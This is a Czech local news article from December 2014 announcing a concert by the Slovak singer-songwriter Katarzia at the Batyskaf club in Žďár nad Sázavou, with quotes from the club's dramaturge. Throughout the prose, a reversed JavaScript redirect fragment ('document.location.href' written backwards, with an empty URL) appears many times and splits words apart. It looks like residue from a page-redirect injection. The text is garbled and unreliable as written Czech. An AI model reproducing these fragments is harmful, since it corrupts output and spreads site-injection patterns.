Rainbow page separator

Objev slovenské scény Katarzia o víkendu v Batyskafu

Středa, 10. prosince 2014

Katarzia

Žďár nad Sázavou. Na Slovensku snad neexistuje člověk, který o ní za poslední rok neslyšel. Katarzia je Katarína Kubošiová, hraje na kytaru a zpívá. Sama si také svoje skladby píše a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jak slova tak i hudbu.

„Katarzia strávila v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to roce dva měsíce v Lisabonu a přivezla si spoustu nových skladeb, které můžeme slyšet jenom při jejích živých vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupeních,“ prozradil nám dramaturg Batyskafu Aleš Kostečka. Ten dodává, že její CD Generácia Y bylo nominováno v cenách Rádia FM Raidohead Awards v kategoriích Nováček roku a World music.
Katarzia dokáže diváky nadchnout svým netradičním projevem, nová[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torským frázováním, odlišným způsobem kompozicí na kytaře, ale především svými skvělými texty, které zrcadlí pohled mladé ženy na současný svět. A možná, že v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ohledu opravdu mluví za celou svoji generaci.
Dnes žije ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zpěvačka v Bratislavě a dokončuje poslední ročník filmové scénáristiky a dramaturgie na VŠMU. V dubnu vyprodala pražský Jazz dock a v létě zazářila na největším slovenském festivalu Pohoda v Trenčíně. „Díky přirozenému splynutí s živě zpívanou písní, ale i natrpklému svědectví o zádrhelích vztahů může připomenout mladou Zuzanu Navarovou”, dokončuje Kostečka.

Koncert ve žďárském Batyskafu odstartuje v sobotu 13. prosince ve 21:00 hodin. (aka)

FOTO: Objev slovenské scény zpěvačka Katarzia

Katarzia
13.12. | 21.00 | 90,-